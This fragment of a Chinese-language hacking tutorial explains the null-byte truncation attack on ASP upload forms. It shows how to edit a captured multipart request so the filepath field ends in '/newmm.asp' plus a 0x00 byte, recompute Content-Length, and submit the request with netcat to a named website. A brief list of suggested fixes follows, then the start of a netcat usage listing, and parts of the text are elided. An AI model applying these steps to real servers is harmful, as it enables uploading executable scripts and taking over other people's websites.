../medias/myphoto/
-----------------------------7d423a138d0278
......
上传
---------------7d423a138d0278-----------------
二、
ultraedit 打开 1.txt 改数据:
......
-----------------------------7d423a138d0278
content-disposition:form-data;name="filepath"
/newmm.asp
█ <===这个黑色代表一个空格是 0x20,改成 0x00 就可以了
......
----------------------------
三、重新计算
cookies 长度,然后 nc 提交
nc-vv_blank>www.xin126.com80<1.txt
ultraedit 是一个 16 位编辑器网上可以下载得到
我们主要用来写那个结束标致
:====>16 位表示:0x00 或者 00h
其实你改的时候就直接再
filepath 的结尾处加个 00 就 ok 了
计算
cookies 长度===>你把 fillepath 改了之后、肯定是或+或
—cookies 的长度变了
......
host:_blank>www.xin126.com
content-length:1969 <======就是这个
connection:keep-alive
cache-control:no-cache
......
计算会吧
?一个字母、数字就是 1
对于上传漏洞提出的解决思路
:(仅供参考)
1、一般的上传是把上传路径作为一个变量来处理
===>我们的对策就是把 filepath 变成常量。。。
这个方法是目前最有效的
(我认为的)
2、加强对于的处理,原来我们是读到这里就结束
我们继续读直道下一个变量开始的地方,处理就
ok 了
附:
NCUsage:
监听外部主机
nc[-options]hostnameport[s][ports]...
监听本地主机